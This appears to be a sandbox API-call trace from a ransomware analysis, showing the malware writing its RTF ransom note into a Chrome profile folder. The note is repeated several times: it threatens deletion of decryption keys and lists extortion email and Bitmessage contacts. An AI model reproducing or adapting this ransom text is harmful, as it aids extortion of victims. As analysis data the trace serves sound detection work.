th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x01zççÞ\x82Os\x98¦\x11\x1bÿÁ\x1e¨©®ÃU+(\x9c3>", lpUsedDefaultChar=0x0) returned 8717 [0204.920] WriteFile (in: hFile=0x2f8, lpBuffer=0x1ef7aa8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7aa8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0204.921] CloseHandle (hObject=0x2f8) returned 1 [0204.921] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\#readme_eman#.rtf")) returned 0xffffffff [0204.921] GetLastError () returned 0x2 [0204.921] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0205.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0205.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0205.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m 